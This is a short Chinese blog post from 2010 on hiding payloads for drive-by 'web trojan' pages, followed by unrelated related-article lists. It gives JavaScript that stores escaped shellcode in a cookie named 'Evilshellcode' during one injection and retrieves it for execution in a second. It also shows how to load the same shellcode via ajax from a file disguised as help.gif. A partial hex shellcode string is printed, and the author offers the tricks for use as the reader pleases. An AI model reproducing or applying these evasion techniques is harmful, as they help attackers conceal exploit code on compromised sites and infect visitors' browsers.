一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
JavaScript 监听textarea中按键事件
Oct 08 Javascript
jQuery validate 中文API 附validate.js中文api手册
Jul 31 Javascript
简易js代码实现计算器操作
Apr 15 Javascript
jquery 鼠标滑动显示详情应用示例
Jan 24 Javascript
jQuery中extend函数的实现原理详解
Feb 03 Javascript
javascript实现图片自动和可控的轮播切换特效
Apr 13 Javascript
js实现(全选)多选按钮的方法【附实例】
Mar 30 Javascript
JS Array创建及concat()split()slice()的使用方法
Jun 03 Javascript
thinkphp标签实现bootsrtap轮播carousel实例代码
Feb 19 Javascript
JavaScript数据类型和变量_动力节点Java学院整理
Jun 26 Javascript
layui动态加载多表头的实例
Sep 05 Javascript
VUE兄弟组件传值操作实例分析
Oct 26 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
php通过COM类调用组件的实现代码
2012/01/11 PHP
php 多关键字 高亮显示实现代码
2012/04/23 PHP
PHP实现的封装验证码类详解
2013/06/18 PHP
详解PHP导入导出CSV文件
2014/11/03 PHP
PHP使用ActiveMQ实例
2018/02/05 PHP
laravel执行php artisan migrate报错的解决方法
2019/10/09 PHP
JavaScript中的函数的两种定义方式和函数变量赋值
2014/05/12 Javascript
AngularJS 防止页面闪烁的方法
2017/03/09 Javascript
利用Plupload.js解决大文件上传问题, 带进度条和背景遮罩层
2017/03/15 Javascript
Nodejs--post的公式详解
2017/04/29 NodeJs
Angular2 自定义validators的实现方法
2017/07/05 Javascript
extjs简介_动力节点Java学院整理
2017/07/17 Javascript
python迭代器的使用方法实例
2013/11/21 Python
在Python中操作列表之List.pop()方法的使用
2015/05/21 Python
Python实现线程状态监测简单示例
2018/03/28 Python
使用Python写一个小游戏
2018/04/02 Python
Python闭包函数定义与用法分析
2018/07/20 Python
Python中使用遍历在列表中添加字典遇到的坑
2019/02/27 Python
Python元组 tuple的概念与基本操作详解【定义、创建、访问、计数、推导式等】
2019/10/30 Python
Python实现密钥密码(加解密)实例详解
2020/04/26 Python
详解Pycharm安装及Django安装配置指南
2020/09/15 Python
24个canvas基础知识小结
2014/12/17 HTML / CSS
HTML5未来发展趋势
2016/02/01 HTML / CSS
Html5应用程序缓存(Cache manifest)
2018/06/04 HTML / CSS
捷克汽车配件和工具销售网站:TorriaCars
2018/02/26 全球购物
End Clothing美国站:英国男士潮牌商城
2018/04/20 全球购物
德国香水、化妆品和护理产品网上商店:Parfumdreams
2018/09/26 全球购物
世界上最大的在线汽车租赁预订平台:Rentalcars.com(支持中文)
2018/10/12 全球购物
泰国王权免税店官方网站:KingPower
2019/03/11 全球购物
新西兰网上购物,折扣店:BestDeals.co.nz
2019/03/20 全球购物
物业总经理岗位职责
2014/02/28 职场文书
丧事主持词大全
2014/04/02 职场文书
《陈涉世家》教学反思
2014/04/12 职场文书
群众路线查摆问题整改措施
2014/10/10 职场文书
pytorch中的model.eval()和BN层的使用
2021/05/22 Python
Java 数组内置函数toArray详解
2021/06/28 Java/Android